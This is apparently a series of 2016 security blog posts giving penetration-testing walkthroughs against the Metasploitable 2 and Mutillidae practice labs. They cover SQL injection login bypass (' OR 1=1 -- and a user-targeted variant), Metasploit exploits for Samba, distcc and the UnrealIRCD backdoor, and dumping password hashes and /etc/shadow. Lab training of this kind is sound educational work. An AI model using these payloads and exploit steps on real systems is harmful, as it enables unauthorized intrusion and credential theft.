Monday, October 17, 2016

Mutillidae OWASP Top 10: A1 Injection - SQLi Bypass Authentication

We have looked at a simple extracting data technique from our previous article

Now lets look at a simple bypassing authentication technique.

Head over to:
OWASP Top 10 > A1 Injection > SQLi - Bypass Authentication > Login

The page looks very similar to the previous article, except what this page does is it logs you in to the system instead of showing information. 

Follow the previous article on how to cause an error with an apostrophe ( ' ). And you can notice that the SQL query is the same as we have seen before. 



This means we can still use our previous string ( ' OR 1=1 -- ) here. 

Enter the string in the name field, 



and Voila! your logged in as admin. 

You are logged in as admin because that is the first record in the accounts table. In the real world, that may not be the case. So we need to target our attack a little bit to log in as a user of our choosing.

Lets try and log in as "john". We know that he is the 3rd user in the accounts table from our previous hack. 

The technique is still simple and similar with a slight change. 

Logging in as a specific user


We know that the below string is a TRUE statement and that it logs us in with the first user on the accounts table who is admin. 

SELECT * FROM accounts WHERE username= ' OR 1=1 -- 
TRUE Statement

We can modify this with one more operator. 

From the statement, we can see that the users under the "username" column and that everything after the OR operator should be TRUE for it to work. We can add an "AND" operator with the username specified. 

SELECT * FROM accounts WHERE username=' OR (1=1 AND username = 'john') -- 
Still TRUE statement

Breakdown:

  • The first apostrophe ( ' ) makes the username input blank. The statement is currently false.
  • But the "OR" operator tells the statement if anything after it is true, then the whole statement becomes true. 
  • "1=1" is a true condition. Just like 2 = 2 or 100 = 100. 
  • The "AND" operator allows to add another condition. Follow link for more info
  • ""username" = 'john'" is true because from our extract data tutorial, there is a "john" user account from the 16 accounts displayed. 
  • With both the conditions around the "AND" operator being true turns the whole statement to TRUE.  
  • The "--" tells the query to ignore out everything after it. 

Right click on the name field and click on Inspect Element. Here we will change the "Maxlength" to 50 so as to fit our new string.



And enter the new string on the name field. 



You've logged in a John! :)



If you got an error that means you dint leave a space at the end of your "--". So make sure to leave a single space character after it. 


-Jayesh Kerai (@secjay)

Friday, October 14, 2016

Mutillidae OWASP Top 10: A1 Injection - SQLi Extract Data

We can start web penetration testing on Metasploitable 2 by accessing Mutillidae over from the web browser of the Kali attacker machine.

Enter the address: <<metasploitable 2 IP address>>/ mutillidae

Mutillidae comes with all of the OWASP top 10 vulnerabilities found on real websites. You can safely practice on common web vulnerabilities on Mutillidae to give you a strong foundation of basic web attacks. 

We will exploit the web vulnerabilities in a sequence starting with A1.

Browse over to OWASP Top 10 > A1 - Injection > SQLi - Extract Data > User Info page. 

SQLi is a type of web attack whereby an attacker will insert an SQL query that will talk with the database of the application and can reveal/retrieve an entire database in favorable cases. 

Lets take a look at the most basic SQL Injection technique.

If you have browsed over to the user info page, it should look like this




A simple form with a username and password field. 


Trial and Error with Default Credentials


When you see such a form, always try out the defualt credentials first. At times you can succeed with default credentials because often they are not changed. for example, username:Admin and password: Admin are the common default passwords. There are tons of default passwords published online for you to try logging in with.

Great resources of default passwords can be gotten at phenoelit.org and defaultpassword.com.


Manipulating SQL Query Strings


Firstly we need to know how the query looks like to be able to manipulate it. Causing errors intentionally on the page can often reveal that information to us.  

On the "name" field enter an apostrophe ( ' ). This will cause an error and give you an output looking like this




From the error table, we can clearly see the SQL query that is used. The query needs a username AND password to be able to view details. 


SELECT * FROM accounts WHERE username=''' AND password=''
This statement will only be true if you know both the username and password

However since we don't have a username and password, we can simply use comments ( -- ) and an "OR" SQL operator to make the statement TRUE without needing the username and password. 


SELECT * FROM accounts WHERE username= ' OR 1=1 -- password=''

Break down:

  • The first apostrophe ( ' ) makes the username input blank. The statement is currently false.
  • But the "OR" operator tells the statement, if anything after it is true, then the whole query becomes true. 
  • "1=1" is a true condition. Just like 2 = 2 or 100 = 100. 
  • The "--" tells the statement to ignore out everything after it. 


So our favorable query would look like


SELECT * FROM accounts WHERE username= ' OR 1=1 -- 
TRUE statement

On the name field,  input: ' OR 1=1 -- 

Do you notice anything below the form? :)




It is important to be familiar with the SQL syntax. tutorialspoint is a great resource for quickly getting on your feet with SQL. 

You can measure your SQL skills by answering this question  - Why did it show us all of the username and passwords? Why not a couple of them or just one of them?


-Jayesh Kerai (@secjay)

Metasploitable 2 & Mutillidae 2.1.19: Correcting Database Errors

Metasploitable 2 comes with Mutillidae 2.1.19 preinstalled. Mutillidae is a free web application penetration testing practice application.  

However, when you try to practice your attacks on Mutillidae, you will be greeted with database errors. 

Here's how to fix the database.

Login to your metasploitable 2 machine

Enter the command: cd /var/www/mutillidae

Then enter the command: sudo nano config.inc



You should then see the following on your screen



move your cursor using your keyboard's arrow keys and change the dbname to "owasp10" as shown below



now hit "ctrl+x", then "Y" to confirm save changes and then "enter".

Once your back on the console, enter the command: sudo /etc/init.d/apache2 reload



On your kali machine, enter the address <<metasploitable 2's machines IP address>>/mutillidae



And click on "Reset DB" and you are good to go. 


-Jayesh Kerai (@secjay)

Thursday, October 13, 2016

Pwning Metasploitable 2: Post Exploitation - Dumping Password Hashes

From our previous exploitation articles we have successfully opened up sessions with our target machines. With open sessions you can do whatever you want on the target machine with the right tools. 

Ill have to admit- we have been skipping a few details during exploitation. While using the exploits, we can also set payloads. Think of payloads as an extra set of tools that you go in with that will help you do more stuff. We will show you how to use payloads in later articles.

Post exploitation is the next step after breaking into the target machine. Lets look at a post exploitation example where we will dump all the password hashes of users on the target system. 

Get an open session 


Follow any of our previous exploitation articles to help you get an open session with the target machine. 

Post exploitation 


Hit ctrl+Z to put the session into background. Enter Y when prompted. 



With this command, the session is still open however it is put on the background so as to allow you to use msfconsole. 

You can have multiple open sessions in the background. 

Check your sessions using the command: sessions



Enter the command: use post/linux/gather/hashdump
Enter the command: show options

This command selects the hashdump script. Metasploit stores all its post exploitation scripts in the "post" folder. We will go through other scripts in later articles. 



Normally we set the RHOST on exploits to give them a target. However on post exploitation scripts in metasploit we give it a session. 

Enter the command: set SESSION 1

The "1" in the command simple corresponds to the 'session 'id' you want the script to run on. You can view your sessions by the "sessions" command shown above. 



...and exploit. 



What you see on your screen are passwords... in hash format. Hashed passwords are then cracked using password cracking techniques or tools to retrieve plain text passwords which we can then use on login fields.  


-Jayesh Kerai (@secjay)

Pwning Metasploitable 2: Exploiting Samba smbd 3.X

Lets look at port 139 on our Metasploitable 2 machine

Discovering the port status and service


Enter the command: nmap -sV -p 139 <<target IP address>>



From the nmap results, we see that the port is open with Samba 3.X running on it. 

Samba is a freeware that allows users to access and read files, access printers and other resources over the network. It is based on the Server Message Block (SMB) protocol

Exploiting Samba


Start up your Metasploit framework using the command "msfconsole"

Search for Samba exploits with: search samba



There are many exploits for samba. Only 1 fits our needs. You can try out different exploits and see the results. 

Enter the command: use exploit/multi/samba/usermap_script
Enter the command: show options



RHOST field is empty. Lets give it the exploit a target.

Enter the command: set RHOST <<target IP address>>



and lastly, enter the command: exploit



Exploited successfully. We have our shell :)


Together with our previous articles, we have gotten multiple shells through vulnerable services. In our next article we will look at post-exploitation. The next step after getting a shell. 


-Jayesh Kerai (@secjay

Wednesday, October 12, 2016

Pwning Metasploitable 2: Exploiting distcc v1 (GNU) 4.2.4

Lets look at port 3632.

Metasploitable 2 is running distcc

distcc is a program that is used to distribute compilation of code across machines on a network taking advantage of unused processing power of other computers. Machines on the network need to have distccd daemon and compatible compiler installed. 


Scanning port 3632


Enter the command: nmap -sV -p 3632 <<target IP address>>



Nmap scan shows that distccd v1 is running on port 3632.


Searching for exploit in msfconsole


Start up your msfconsole and search for a distcc exploit. 

Enter the command: search distcc




There is an exploit available for distcc. More references here and here.


Exploiting distcc using distcc_exec exploit


Lets use the exploit by giving the command: use exploit/unix/misc/distcc_exec




As usual, we need to give the exploit a target. 

Enter the command: set RHOST <<target IP address>>




...and exploit :)



Exploit was successful as a command shell session was opened.

However, unlike other time where we got "root" as our id, here we got daemon as the id. that means we compromised the target with daemon rights. 

A daemon is a program that runs a background process. It cant do nearly as much as a root. 

Good news is that we have privilege escalation. It bumps the privilege level to root by exploiting bugs in the code. We will use privilege escalation soon to bump our access level from daemon to root. 


-Jayesh Kerai (@secjay)

Pwning Metasploitable 2: Exploiting Malicious Backdoor on UnrealIRCD 3.2.8.1

Let’s look at port 6667.


Challenge:
Nmap doesn’t show you the version of the Unreal ircd. Another way to find out the version of the IRC server is to connect to it using an IRC client. There are many clients to choose from, however for starters look at “HexChat”.

Install HexChat and connect to the IRC server to find out and verify the version.

Fire up your Kali attacker and vulnerable Metasploitable 2 machines.

Searching Metasploit Console


Startup Metasploit framework on Kali using the "msfconsole" command.

Enter the command: search unreal

This command will tell the msfconsole to search it’s database for anything relating to “unreal”



3 exploit have been found. If you’ve completed the challenge above you will know that the 2nd exploit is what we need as it matches the version of IRC on the Metasploitable 2 machine.

UnrealIRCD 3.2.8.1 Backdoor Exploit


Enter the command: use exploit/unix/irc/unreal_ircd_3281_backdoor

After the exploit is set, we use “show options” command to fill in any required setting that is unfilled.



Looks like the “RHOST” is unfilled. RHOST stands for Remote Host a.k.a Target machine.

Enter the command: set RHOST <<target IP address>>



We are all set now. Enter the command: exploit


And there we have our root access.

You will notice a new command here - "grep root /etc/shadow". Google what is the shadow file. 

If you understood this well, congratulations. You are now a script kiddie. 

More seasoned security people most often tweak these exploits by manually selecting compatible preferred payloads, while the experts prefer to manually edit the whole exploit code to their liking.

Bitcrack's Advanced Hacking course is built specifically to teach you how fully customize your exploits to your likes, slice open malware's and more. Send us a tweet to find out more or reach out to us from here


-Jayesh Kerai (@secjay)